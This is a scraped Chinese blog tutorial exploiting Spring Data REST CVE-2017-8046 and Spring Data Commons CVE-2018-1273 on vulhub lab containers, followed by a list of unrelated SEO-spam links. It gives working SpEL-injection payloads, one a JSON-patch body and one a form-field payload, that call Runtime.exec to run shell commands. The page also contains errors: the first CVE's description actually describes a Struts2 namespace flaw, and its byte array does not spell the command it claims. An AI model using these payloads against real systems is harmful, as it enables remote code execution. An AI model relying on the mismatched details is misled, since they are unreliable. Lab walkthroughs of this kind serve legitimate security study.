当前位置: 首页 > wzjs >正文

杭州网站推广优化哪里好网页设计需要学什么

杭州网站推广优化哪里好,网页设计需要学什么,网站如何做软文推广,crm销售管理一、CVE-2017-8046-Spring Data Rest 远程命令执行命令 漏洞环境 vulhub靶场 /spring/CVE-2017-8046 漏洞简介 漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞…

一、CVE-2017-8046-Spring Data Rest 远程命令执行命令

漏洞环境

vulhub靶场 /spring/CVE-2017-8046

漏洞简介

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。

第一步:开启靶场,访问漏洞页面

#URL
http://47.103.81.25:8080/customers/1
第二步:在本页面抓包,构造payload

#请求方式
先右键修改请求方式改为POST,再直接将POST改为PATCH#Content-Typ
application/json-patch+json#发送数据
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]#数据中
new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码
第三步:在云服务器进入此靶场容器的终端

#命令docker ps查看容器id
77e610fd0066#进入终端
docker exec -it 77e610fd0066 /bin/bash
第四步:打开bp,发送后,返回云服务器切换到/tmp目录,查看文件,成功上传

二、CVE-2018-1273-Spring代码执行漏洞

漏洞简介

Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令。

第一步:访问靶场地址
#URL
http://47.103.81.25:8080/users
第二步:填写注册信息,bp抓包,发送到重放器

第三步:删除提交的内容,构造payload

#构造payload
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/iyu")]=&password=&repeatedPassword=
第四步:在云服务器进入此靶场容器的终端,查看是否成功上传文件

#命令docker ps查看容器id
769e92400e15#进入终端
docker exec -it 769e92400e15 /bin/bash#查看是否成功上传
ls /tmp

                                                                                                                                FROM  IYU_

http://www.dtcms.com/wzjs/169876.html

相关文章:

  • 网站怎么做内链外链网站建设的推广渠道
  • 青岛网站建设技术托管网站推广找客户
  • 张家港做网站的公司优化公司哪家好
  • dw做框架网站大数据查询个人信息
  • 哪个淘宝客网站最好宁波seo网站推广软件
  • 彩票网站做任务赚钱线上渠道推广有哪些方式
  • 做网站的公司为什么人少了40个免费靠谱网站
  • 网站开发word百度如何发布信息推广
  • 用asp.net做的网站模板下载百度人工客服电话是多少
  • 怎么做网站建设赚钱品牌策划案
  • 小甲鱼网站开发做网站公司哪家正规
  • 做网站需要注意些什么网站访问量
  • 不锈钢餐具做外贸哪个网站好嘉兴seo
  • 网站建设制作公司哪家google play官网下载
  • 哪些网站是用织梦做的百度科技有限公司
  • 图书馆网站建设的要求手机百度旧版本下载
  • php网站开发平台百度在全国有哪些代理商
  • 博物馆建设 政府网站seo百度快速排名软件
  • 安阳中飞网站建设外贸网站建设优化
  • 淘宝代运营一般多少钱关键词优化方法
  • 国外网站空间 月付百度免费推广平台
  • 潍坊一品网站制作seo整站网站推广优化排名
  • 淄博 网站建设舆情信息报送
  • 西城专业网站建设公司哪家好seo怎么去优化
  • 网站建设出找不到网页推广普通话的意义30字
  • 中国执行信息公开网查询北京seo做排名
  • wordpress列表页怎么写谷歌seo课程
  • 网站构成的作用是什么网易最新消息新闻
  • ecshop手机网站开发百度网盘破解版
  • php源码 个人网站网上推广